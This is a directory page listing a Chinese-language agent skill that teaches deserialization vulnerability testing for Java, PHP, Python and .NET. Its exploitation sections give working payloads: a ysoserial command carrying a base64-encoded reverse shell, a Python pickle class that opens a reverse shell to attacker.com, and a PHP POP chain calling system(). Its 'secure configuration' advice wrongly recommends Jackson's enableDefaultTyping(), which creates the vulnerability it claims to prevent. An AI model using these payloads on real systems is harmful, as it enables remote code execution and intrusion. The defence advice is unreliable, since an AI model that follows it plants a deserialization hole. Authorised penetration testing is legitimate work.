MCP.directory

deserialization-testing

by Ed1s0nZ
6
0
Source

反序列化漏洞测试的专业技能和方法论

Install

mkdir -p .claude/skills/deserialization-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/3245" && unzip -o skill.zip -d .claude/skills/deserialization-testing && rm skill.zip

Installs to .claude/skills/deserialization-testing

About this skill

反序列化漏洞测试

概述

反序列化漏洞是一种利用应用程序反序列化不可信数据导致的漏洞,可能导致远程代码执行、拒绝服务等。本技能提供反序列化漏洞的检测、利用和防护方法。

漏洞原理

应用程序将序列化的数据反序列化为对象时,如果数据来源不可信,攻击者可以构造恶意序列化数据,在反序列化过程中执行任意代码。

常见格式

Java

常见库:

  • Java原生序列化
  • Jackson
  • Fastjson
  • XStream
  • Apache Commons Collections

PHP

常见函数:

  • unserialize()
  • json_decode()

Python

常见模块:

  • pickle
  • yaml
  • json

.NET

常见类:

  • BinaryFormatter
  • SoapFormatter
  • DataContractSerializer

测试方法

1. 识别序列化数据

Java序列化特征:

AC ED 00 05 (十六进制)
rO0 (Base64)

PHP序列化特征:

O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}

Python pickle特征:

\x80\x03

2. 检测反序列化点

常见位置:

  • Cookie值
  • Session数据
  • API参数
  • 文件上传
  • 缓存数据
  • 消息队列

3. Java反序列化

Apache Commons Collections利用:

// 使用ysoserial生成Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin

常见Gadget链:

  • CommonsCollections1-7
  • Spring1-2
  • ROME
  • Jdk7u21

4. PHP反序列化

基础测试:

<?php
class Test {
    public $cmd = "id";
    function __destruct() {
        system($this->cmd);
    }
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>

魔术方法利用:

  • __destruct()
  • __wakeup()
  • __toString()
  • __call()

5. Python pickle

基础测试:

import pickle
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('id',))

pickle.dumps(RCE())

利用技术

Java RCE

使用ysoserial:

# 生成Payload
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin

# Base64编码
base64 -w 0 payload.bin

手动构造:

// 使用Gadget链构造恶意对象
// 参考ysoserial源码

PHP RCE

利用POP链:

<?php
class A {
    public $b;
    function __destruct() {
        $this->b->test();
    }
}

class B {
    public $c;
    function test() {
        call_user_func($this->c, "id");
    }
}

$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>

Python RCE

Pickle RCE:

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))

绕过技术

编码绕过

Base64编码:

原始: rO0ABXNy...
编码: ck8wQUJYTnk...

URL编码:

%72%4F%00%AB...

过滤器绕过

使用不同Gadget链:

  • 如果CommonsCollections被过滤,尝试Spring
  • 如果某个版本被过滤,尝试其他版本

类名混淆

使用反射:

Class.forName("java.lang.Runtime").getMethod("exec", String.class)

工具使用

ysoserial

# 列出可用Gadget
java -jar ysoserial.jar

# 生成Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin

# 生成Base64
java -jar ysoserial.jar CommonsCollections1 "command" | base64

PHPGGC

# 列出可用Gadget
./phpggc -l

# 生成Payload
./phpggc Monolog/RCE1 system id

# 生成编码Payload
./phpggc -b Monolog/RCE1 system id

Burp Suite

  1. 拦截包含序列化数据的请求
  2. 使用插件生成Payload
  3. 替换原始数据
  4. 观察响应

验证和报告

验证步骤

  1. 确认可以控制序列化数据
  2. 验证反序列化触发代码执行
  3. 评估影响(RCE、数据泄露等)
  4. 记录完整的POC

报告要点

  • 漏洞位置和序列化数据格式
  • 使用的Gadget链或利用方式
  • 完整的利用步骤和PoC
  • 修复建议(输入验证、使用安全序列化等)

防护措施

推荐方案

  1. 避免反序列化不可信数据

    • 使用JSON替代
    • 使用安全的序列化格式

  2. 输入验证

    // 白名单验证类名
private static final Set<String> ALLOWED_CLASSES = 
    Set.of("com.example.SafeClass");

private Object readObject(ObjectInputStream ois) {
    // 验证类名
    // ...
}

  3. 使用安全配置

    // Jackson配置
objectMapper.enableDefaultTyping();
objectMapper.setVisibility(PropertyAccessor.FIELD, 
    JsonAutoDetect.Visibility.ANY);

  4. 类加载器隔离

    • 使用自定义ClassLoader
    • 限制可加载的类

  5. 监控和日志

    • 记录反序列化操作
    • 监控异常行为

注意事项

  • 仅在授权测试环境中进行
  • 注意不同版本库的Gadget链差异
  • 测试时注意Payload大小限制
  • 了解目标应用的依赖库版本

More by Ed1s0nZ

View all skills by Ed1s0nZ

xpath-injection-testing

Ed1s0nZ

XPath注入漏洞测试的专业技能和方法论

00

csrf-testing

Ed1s0nZ

CSRF跨站请求伪造测试的专业技能和方法论

00

file-upload-testing

Ed1s0nZ

文件上传漏洞测试的专业技能和方法论

10

cloud-security-audit

Ed1s0nZ

云安全审计的专业技能和方法论

10

xss-testing

Ed1s0nZ

XSS跨站脚本攻击测试的专业技能

20

api-security-testing

Ed1s0nZ

API安全测试的专业技能和方法论

30

You might also like

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

643969

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

591705

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

318398

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

339397

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

451339

fastapi-templates

wshobson

Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.

304231

Stay ahead of the MCP ecosystem

Get weekly updates on new skills and servers.